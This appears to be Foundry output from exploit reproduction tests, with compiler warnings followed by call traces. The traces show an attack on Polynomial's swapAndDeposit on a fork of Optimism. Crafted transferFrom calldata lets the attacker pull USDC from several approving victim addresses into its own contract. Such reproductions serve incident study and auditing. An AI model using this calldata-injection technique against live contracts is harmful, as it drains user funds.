Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.17s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
  --> src/test/2022-11/Polynomial_exp.sol:26:5:
   |
26 |     IERC20 private constant USDT = IERC20(0x94b008aA00579c1307B0EF2c499aD98a8ce58e58);
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
    --> src/test/interface.sol:1878:1:
     |
1878 | interface USDT {
     | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
  --> src/test/2022-11/Polynomial_exp.sol:27:5:
   |
27 |     IERC20 private constant WETH = IERC20(0x4200000000000000000000000000000000000006);
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
  --> src/test/2022-11/Polynomial_exp.sol:28:5:
   |
28 |     IERC20 private constant USDC = IERC20(0x7F5c764cBc14f9669B88837ca1490cCa17c31607);
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
    --> src/test/interface.sol:3064:1:
     |
3064 | interface USDC {
     | ^ (Relevant source part starts here and spans across multiple lines).

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2022-11/Polynomial_exp.sol:87:9:
   |
87 |         address account
   |         ^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2022-11/Polynomial_exp.sol:92:22:
   |
92 |     function approve(address spender, uint256 amount) public pure returns (bool) {
   |                      ^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2022-11/Polynomial_exp.sol:92:39:
   |
92 |     function approve(address spender, uint256 amount) public pure returns (bool) {
   |                                       ^^^^^^^^^^^^^^

Warning (2018): Function state mutability can be restricted to pure
  --> src/test/2022-11/Polynomial_exp.sol:86:5:
   |
86 |     function balanceOf(
   |     ^ (Relevant source part starts here and spans across multiple lines).


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 810.82ms (1.90ms CPU time)

Ran 1 test for src/test/2022-11/Polynomial_exp.sol:ContractTest
[PASS] testExploit() (gas: 196743)
Logs:
  [End] Attacker USDC balance after exploit: 209.167120

Traces:
  [3671] ContractTest::setUp()
    ├─ [0] VM::createSelectFork("optimism", 39343642 [3.934e7])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [229943] ContractTest::testExploit()
    ├─ [2585] 0x7F5c764cBc14f9669B88837ca1490cCa17c31607::balanceOf(0x6467024Ef6247A94c8cf60D50715aE71B8B1dfBf) [staticcall]
    │   └─ ← [Return] 53167120 [5.316e7]
    ├─ [55399] 0xDEEB242E045e5827Edf526399bd13E7fFEba4281::swapAndDeposit(0x6467024Ef6247A94c8cf60D50715aE71B8B1dfBf, 0xEeeeeEeeeEeEeeEeEeEeeEEEeeeeEeeeeeeeEEeE, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x7F5c764cBc14f9669B88837ca1490cCa17c31607, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0, 0x23b872dd0000000000000000000000006467024ef6247a94c8cf60d50715ae71b8b1dfbf0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e149600000000000000000000000000000000000000000000000000000000032b4410)
    │   ├─ [44790] 0x7F5c764cBc14f9669B88837ca1490cCa17c31607::transferFrom(0x6467024Ef6247A94c8cf60D50715aE71B8B1dfBf, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 53167120 [5.316e7])
    │   │   ├─ emit Transfer(from: 0x6467024Ef6247A94c8cf60D50715aE71B8B1dfBf, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 53167120 [5.316e7])
    │   │   ├─ emit Approval(owner: 0x6467024Ef6247A94c8cf60D50715aE71B8B1dfBf, spender: 0xDEEB242E045e5827Edf526399bd13E7fFEba4281, value: 127832880 [1.278e8])
    │   │   ├─  storage changes:
    │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0 → 0x00000000000000000000000000000000000000000000000000000000032b4410
    │   │   │   @ 0x528a298aea05f57d255a6a40d803ceabd57dbdd16388cea951078cc24f8ff061: 0x00000000000000000000000000000000000000000000000000000000032b4410 → 0
    │   │   │   @ 0x6a7d0fee00ef085bc810b32179f57ddbcc7bdbbc127004c7e0b8389e3ad92510: 0x000000000000000000000000000000000000000000000000000000000ac9d740 → 0x00000000000000000000000000000000000000000000000000000000079e9330
    │   │   └─ ← [Return] true
    │   ├─ [730] ContractTest::balanceOf(0xDEEB242E045e5827Edf526399bd13E7fFEba4281) [staticcall]
    │   │   └─ ← [Return] 1
    │   ├─ [841] ContractTest::approve(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1)
    │   │   └─ ← [Return] true
    │   ├─ [707] ContractTest::initiateDeposit(0x6467024Ef6247A94c8cf60D50715aE71B8B1dfBf, 1)
    │   │   └─ ← [Stop]
    │   └─ ← [Stop]
    ├─ [31499] 0xB162f01C5BDA7a68292410aaA059E7Ce28D77c82::swapAndDeposit(0x59022C79236A0F90bAc80b29357bc1d3e6d227d5, 0xEeeeeEeeeEeEeeEeEeEeeEEEeeeeEeeeeeeeEEeE, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x7F5c764cBc14f9669B88837ca1490cCa17c31607, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0, 0x23b872dd00000000000000000000000059022c79236a0f90bac80b29357bc1d3e6d227d50000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e14960000000000000000000000000000000000000000000000000000000000989680)
    │   ├─ [20890] 0x7F5c764cBc14f9669B88837ca1490cCa17c31607::transferFrom(0x59022C79236A0F90bAc80b29357bc1d3e6d227d5, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 10000000 [1e7])
    │   │   ├─ emit Transfer(from: 0x59022C79236A0F90bAc80b29357bc1d3e6d227d5, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 10000000 [1e7])
    │   │   ├─ emit Approval(owner: 0x59022C79236A0F90bAc80b29357bc1d3e6d227d5, spender: 0xB162f01C5BDA7a68292410aaA059E7Ce28D77c82, value: 50000000 [5e7])
    │   │   ├─  storage changes:
    │   │   │   @ 0xd4e8895c60006d5a5676e3843d9b4e95c23739f0c8678fe5d700f9ec471063c6: 0x0000000000000000000000000000000000000000000000000000000003938700 → 0x0000000000000000000000000000000000000000000000000000000002faf080
    │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0x00000000000000000000000000000000000000000000000000000000032b4410 → 0x0000000000000000000000000000000000000000000000000000000003c3da90
    │   │   │   @ 0x84a1854c57725a1a833f15decd0ec6484ff5d7ad1f63bb57c121ed5c4751fe50: 0x0000000000000000000000000000000000000000000000000000000008b597d4 → 0x00000000000000000000000000000000000000000000000000000000081d0154
    │   │   └─ ← [Return] true
    │   ├─ [730] ContractTest::balanceOf(0xB162f01C5BDA7a68292410aaA059E7Ce28D77c82) [staticcall]
    │   │   └─ ← [Return] 1
    │   ├─ [841] ContractTest::approve(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1)
    │   │   └─ ← [Return] true
    │   ├─ [707] ContractTest::initiateDeposit(0x59022C79236A0F90bAc80b29357bc1d3e6d227d5, 1)
    │   │   └─ ← [Stop]
    │   └─ ← [Stop]
    ├─ [2687] 0x7F5c764cBc14f9669B88837ca1490cCa17c31607::allowance(0xDa1521c966bc95324E156f4F04B28F2804985da5, 0xB162f01C5BDA7a68292410aaA059E7Ce28D77c82) [staticcall]
    │   └─ ← [Return] 50000000 [5e7]
    ├─ [25499] 0xB162f01C5BDA7a68292410aaA059E7Ce28D77c82::swapAndDeposit(0xDa1521c966bc95324E156f4F04B28F2804985da5, 0xEeeeeEeeeEeEeeEeEeEeeEEEeeeeEeeeeeeeEEeE, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x7F5c764cBc14f9669B88837ca1490cCa17c31607, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0, 0x23b872dd000000000000000000000000da1521c966bc95324e156f4f04b28f2804985da50000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e14960000000000000000000000000000000000000000000000000000000002faf080)
    │   ├─ [16890] 0x7F5c764cBc14f9669B88837ca1490cCa17c31607::transferFrom(0xDa1521c966bc95324E156f4F04B28F2804985da5, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 50000000 [5e7])
    │   │   ├─ emit Transfer(from: 0xDa1521c966bc95324E156f4F04B28F2804985da5, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 50000000 [5e7])
    │   │   ├─ emit Approval(owner: 0xDa1521c966bc95324E156f4F04B28F2804985da5, spender: 0xB162f01C5BDA7a68292410aaA059E7Ce28D77c82, value: 0)
    │   │   ├─  storage changes:
    │   │   │   @ 0x3daa43f51a9b70bb0e56146e41f6bc906c05e9c76bdce35c2a37821a6ede47ec: 0x0000000000000000000000000000000000000000000000000000000002faf080 → 0
    │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0x0000000000000000000000000000000000000000000000000000000003c3da90 → 0x0000000000000000000000000000000000000000000000000000000006becb10
    │   │   │   @ 0x5c631b72a5af095b87b0b8848c6184d557b206059e04096e9e48054d12b3f19e: 0x0000000000000000000000000000000000000000000000000000000022540bc6 → 0x000000000000000000000000000000000000000000000000000000001f591b46
    │   │   └─ ← [Return] true
    │   ├─ [730] ContractTest::balanceOf(0xB162f01C5BDA7a68292410aaA059E7Ce28D77c82) [staticcall]
    │   │   └─ ← [Return] 1
    │   ├─ [841] ContractTest::approve(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1)
    │   │   └─ ← [Return] true
    │   ├─ [707] ContractTest::initiateDeposit(0xDa1521c966bc95324E156f4F04B28F2804985da5, 1)
    │   │   └─ ← [Stop]
    │   └─ ← [Stop]
    ├─ [2687] 0x7F5c764cBc14f9669B88837ca1490cCa17c31607::allowance(0xfd47c9Ad54D12Caa895FabCD4f7F4308a5F24161, 0xB162f01C5BDA7a68292410aaA059E7Ce28D77c82) [staticcall]
    │   └─ ← [Return] 50000000 [5e7]
    ├─ [25499] 0xB162f01C5BDA7a68292410aaA059E7Ce28D77c82::swapAndDeposit(0xfd47c9Ad54D12Caa895FabCD4f7F4308a5F24161, 0xEeeeeEeeeEeEeeEeEeEeeEEEeeeeEeeeeeeeEEeE, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x7F5c764cBc14f9669B88837ca1490cCa17c31607, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0, 0x23b872dd000000000000000000000000fd47c9ad54d12caa895fabcd4f7f4308a5f241610000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e14960000000000000000000000000000000000000000000000000000000002faf080)
    │   ├─ [16890] 0x7F5c764cBc14f9669B88837ca1490cCa17c31607::transferFrom(0xfd47c9Ad54D12Caa895FabCD4f7F4308a5F24161, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 50000000 [5e7])
    │   │   ├─ emit Transfer(from: 0xfd47c9Ad54D12Caa895FabCD4f7F4308a5F24161, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 50000000 [5e7])
    │   │   ├─ emit Approval(owner: 0xfd47c9Ad54D12Caa895FabCD4f7F4308a5F24161, spender: 0xB162f01C5BDA7a68292410aaA059E7Ce28D77c82, value: 0)
    │   │   ├─  storage changes:
    │   │   │   @ 0xd0677cf14a0f9c21a56f4ce52573e18bad94af0203016f398e5456e57b45a378: 0x0000000000000000000000000000000000000000000000000000000002faf080 → 0
    │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0x0000000000000000000000000000000000000000000000000000000006becb10 → 0x0000000000000000000000000000000000000000000000000000000009b9bb90
    │   │   │   @ 0x0a5430570447f810357303bb7dbe24a25f76ad538c2d092eb31821d8b82cd04d: 0x00000000000000000000000000000000000000000000000000000000098646de → 0x00000000000000000000000000000000000000000000000000000000068b565e
    │   │   └─ ← [Return] true
    │   ├─ [730] ContractTest::balanceOf(0xB162f01C5BDA7a68292410aaA059E7Ce28D77c82) [staticcall]
    │   │   └─ ← [Return] 1
    │   ├─ [841] ContractTest::approve(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1)
    │   │   └─ ← [Return] true
    │   ├─ [707] ContractTest::initiateDeposit(0xfd47c9Ad54D12Caa895FabCD4f7F4308a5F24161, 1)
    │   │   └─ ← [Stop]
    │   └─ ← [Stop]
    ├─ [2687] 0x7F5c764cBc14f9669B88837ca1490cCa17c31607::allowance(0x316c42Af89b913429DBe4a86f30373172340A821, 0xB162f01C5BDA7a68292410aaA059E7Ce28D77c82) [staticcall]
    │   └─ ← [Return] 46000000 [4.6e7]
    ├─ [25499] 0xB162f01C5BDA7a68292410aaA059E7Ce28D77c82::swapAndDeposit(0x316c42Af89b913429DBe4a86f30373172340A821, 0xEeeeeEeeeEeEeeEeEeEeeEEEeeeeEeeeeeeeEEeE, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x7F5c764cBc14f9669B88837ca1490cCa17c31607, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0, 0x23b872dd000000000000000000000000316c42af89b913429dbe4a86f30373172340a8210000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e14960000000000000000000000000000000000000000000000000000000002bde780)
    │   ├─ [16890] 0x7F5c764cBc14f9669B88837ca1490cCa17c31607::transferFrom(0x316c42Af89b913429DBe4a86f30373172340A821, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 46000000 [4.6e7])
    │   │   ├─ emit Transfer(from: 0x316c42Af89b913429DBe4a86f30373172340A821, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 46000000 [4.6e7])
    │   │   ├─ emit Approval(owner: 0x316c42Af89b913429DBe4a86f30373172340A821, spender: 0xB162f01C5BDA7a68292410aaA059E7Ce28D77c82, value: 0)
    │   │   ├─  storage changes:
    │   │   │   @ 0x777feb8998cb84162276136e109db2a2d240c8229363194237a2663cd32bbe20: 0x0000000000000000000000000000000000000000000000000000000002bde780 → 0
    │   │   │   @ 0x444e3ad3baabdfad4f7ec340984f3103fea19ec34de60b4efbce7fdbddf87570: 0x000000000000000000000000000000000000000000000000000000000b869384 → 0x0000000000000000000000000000000000000000000000000000000008c8ac04
    │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0x0000000000000000000000000000000000000000000000000000000009b9bb90 → 0x000000000000000000000000000000000000000000000000000000000c77a310
    │   │   └─ ← [Return] true
    │   ├─ [730] ContractTest::balanceOf(0xB162f01C5BDA7a68292410aaA059E7Ce28D77c82) [staticcall]
    │   │   └─ ← [Return] 1
    │   ├─ [841] ContractTest::approve(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1)
    │   │   └─ ← [Return] true
    │   ├─ [707] ContractTest::initiateDeposit(0x316c42Af89b913429DBe4a86f30373172340A821, 1)
    │   │   └─ ← [Stop]
    │   └─ ← [Stop]
    ├─ [585] 0x7F5c764cBc14f9669B88837ca1490cCa17c31607::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 209167120 [2.091e8]
    ├─ [2401] 0x7F5c764cBc14f9669B88837ca1490cCa17c31607::decimals() [staticcall]
    │   └─ ← [Return] 6
    ├─ emit log_named_decimal_uint(key: "[End] Attacker USDC balance after exploit", val: 209167120 [2.091e8], decimals: 6)
    ├─  storage changes:
    │   @ 0: 2 → 1
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 17.39s (13.81s CPU time)

Ran 2 test suites in 17.41s (18.20s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
